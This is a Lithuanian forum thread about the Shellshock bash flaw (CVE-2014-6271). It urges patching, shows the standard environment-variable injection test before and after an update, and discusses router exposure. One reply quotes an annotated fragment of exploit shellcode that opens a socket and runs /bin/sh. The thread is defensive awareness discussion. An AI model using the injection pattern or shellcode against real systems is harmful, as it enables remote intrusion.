Prisijungti

CVE-2014-6271

TechtronicMindaugas N.
  • 25 Rugs '14

Paskubam atsinaujinti, debian, ubuntu, rhel jau turi atnaujinimus.

Testas:

sh-4.2$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test
sh-4.2$

Po atnaujinimo:

sh-4.2$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test
sh-4.2$

http://web.nvd.nist.gov/view/vuln/detai ... -2014-6271
https://lists.debian.org/debian-securit ... 00220.html
http://lists.centos.org/pipermail/cento ... 46099.html

  • 26 Rugs '14

Kas nors gali paaiskinti ar sitas bugas tarkime paveiktu visus tuos wireless routerius kurie greiciausiai nesiupdeitina? Kaip suprantu klausimas gal retorinis.

Bet siaip idomus bugas kuriam ~20 metu.

TechtronicMindaugas N.
  • 26 Rugs '14

Na ekspertai sako, kad bash bug'as yra baisesnis uz heartbleed bug'a.
Jeigu galima connect i tuos routerius, ir jie naudoja tarkim CGI (web control panelis) tai aisku jie yra vulnerable.

Exploitai jau startavo

.....
0x08048059    43           inc ebx  // = "SYS_SOCKET" = "socket" ()
0x0804805a    53           push ebx  // Build arg array for INET { protocol = 0, push BYTE 0x1 ; (in reverse) SOCK_STREAM = 1, push BYTE 0x2 ; AF_INET = 2 }
0x0804805b    6a02         push 0x2  // 0x00000002 = "PF_INET"
.....
0x08048083    52           push edx ; push null string termination
0x08048084    682f2f7368   push 0x68732f2f ; // push "//sh" to the stack
0x08048089    682f62696e   push 0x6e69622f ; //push "/bin" to the stack
0x0804808e    89e3         mov ebx, esp // addr of "/bin//sh" into ebx via esp
0x08048090    52           push edx // push x32 null terminator to stack
0x08048091    53           push ebx // push string address to stack up from null terminator point
0x08048092    89e1         mov ecx, esp // arg array with string ptr
0x08048094    b00b         mov al, 0xb
0x08048096    cd80         int 0x80 // execve("/bin//sh", ["/bin//sh", NULL], [NULL])
TechtronicMindaugas N.
  • 27 Rugs '14

https://shellshocker.net/

Kaip suprantu dar nera official patch'o, kas yra sad. Startavo jau ir botnet atakos.

Atsakyti